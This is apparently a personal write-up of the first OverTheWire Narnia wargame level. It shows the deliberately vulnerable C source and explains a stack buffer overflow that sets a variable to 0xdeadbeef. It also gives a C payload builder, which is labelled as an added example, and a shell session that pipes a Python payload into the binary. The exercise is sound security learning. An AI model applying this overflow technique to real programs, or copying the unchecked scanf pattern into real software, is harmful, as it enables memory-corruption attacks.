To supplement the stack exercises in Protostar, I’m also working on the Narnia wargame from overthewire.org. It seems to deal with similar material, and I’m hoping it will reinforce what I’m doing with Protostar.

So, that said, the first Narnia challenge is thus:

#include <stdio.h>
#include <stdlib.h>

int main(){
        long val=0x41414141;    /* 4 bytes in this 32-bit build, sitting right past the end of buf */
        char buf[20];           /* 20 bytes; anything written past them spills into val */

        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s",&buf);     /* accepts up to 24 characters into a 20-byte buffer */

        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);

        if(val==0xdeadbeef)
                system("/bin/sh");
        else {
                printf("WAY OFF!!!!\n");
                exit(1);
        }

        return 0;
}

This appears to be basically the same setup as Protostar level 2. We have an integer and a character buffer on the stack, and our goal is to set the variable val to 0xdeadbeef. The buffer is 20 bytes, but the scanf format accepts up to 24 characters, which is exactly enough to fill buf and overwrite the four bytes of val that sit right past its end. So we again use Python to spit out 20 bytes of padding with another four bytes appended, and those four bytes get written into val. As a reminder, because the architecture is little endian, the least significant byte goes first: 0xdeadbeef has to be sent as ef be ad de.
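As an added example (not part of the original post or of the Narnia source), here is the same payload construction in C: pack_le32 writes the target value least-significant byte first, build_payload prepends the padding that fills buf, and simulate_overflow copies the result over a struct laid out like the narnia0 frame so the spill into val can be checked without touching the real binary. The struct layout, the uint32_t standing in for the 32-bit binary's long, and the program name le_payload are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the narnia0 frame: 20 bytes of buf followed
 * immediately by a 4-byte val. This is an assumption for the example, not
 * the real stack layout; uint32_t plays the role of the 32-bit build's long. */
struct frame {
    char buf[20];
    uint32_t val;
};
_Static_assert(sizeof(struct frame) == 24, "buf and val must be adjacent, no padding");

#define BUF_LEN 20
#define PAYLOAD_LEN (BUF_LEN + 4)

/* Write v as four bytes, least-significant byte first (little endian). */
void pack_le32(uint32_t v, unsigned char out[4]) {
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Build the payload: pad bytes of 'A' to fill buf, then the target value.
 * Returns the payload length, or 0 if the output buffer is too small. */
size_t build_payload(unsigned char *out, size_t out_len, size_t pad, uint32_t value) {
    if (out_len < pad + 4) return 0;
    memset(out, 'A', pad);
    pack_le32(value, out + pad);
    return pad + 4;
}

/* Mimic what the oversized scanf does: copy the payload over buf and let it
 * run into val. A memcpy into the whole struct is well-defined, unlike the
 * real overflow. Returns the value the program would then see in val. */
uint32_t simulate_overflow(const unsigned char *payload, size_t len) {
    struct frame f;
    memset(f.buf, 0, sizeof f.buf);
    f.val = 0x41414141u;
    size_t n = len < sizeof f ? len : sizeof f;
    memcpy(&f, payload, n);
    return f.val;
}

/* The simulated val only reads back as 0xdeadbeef on a little-endian host,
 * which is the case narnia0 runs on. */
int host_is_little_endian(void) {
    uint32_t one = 1;
    unsigned char first;
    memcpy(&first, &one, 1);
    return first == 1;
}

int main(void) {
    unsigned char payload[PAYLOAD_LEN];
    size_t len = build_payload(payload, sizeof payload, BUF_LEN, 0xdeadbeefu);

    /* Hex dump to stderr so stdout stays clean for piping: ./le_payload | ./narnia0 */
    for (size_t i = 0; i < len; i++) fprintf(stderr, "%02x ", payload[i]);
    fprintf(stderr, "\nsimulated val: 0x%08x\n", simulate_overflow(payload, len));

    /* Raw bytes plus a newline, which ends the %24s token just like print did. */
    fwrite(payload, 1, len, stdout);
    fputc('\n', stdout);
    return 0;
}
```

The hex dump should read twenty 41s followed by ef be ad de, and the simulated val should print as 0xdeadbeef on a little-endian machine, which is the same check the real program's "val:" line gives you.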

narnia0@narnia:/narnia$ python -c 'print "A" * 20 + "\xef\xbe\xad\xde"' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ▒
val: 0xdeadbeef
narnia0@narnia:/narnia$ whoami
narnia0
narnia0@narnia:/narnia$

WTF? We can see that the program is confirming that I’ve set val to the proper value, and yet it didn’t seem to spawn the shell. Something is fishy here…
I can set a breakpoint on the line that spawns the shell, and the program is definitely getting there, but something is apparently going amiss inside the function call. I guess I’m stalled until I can figure out why this is failing.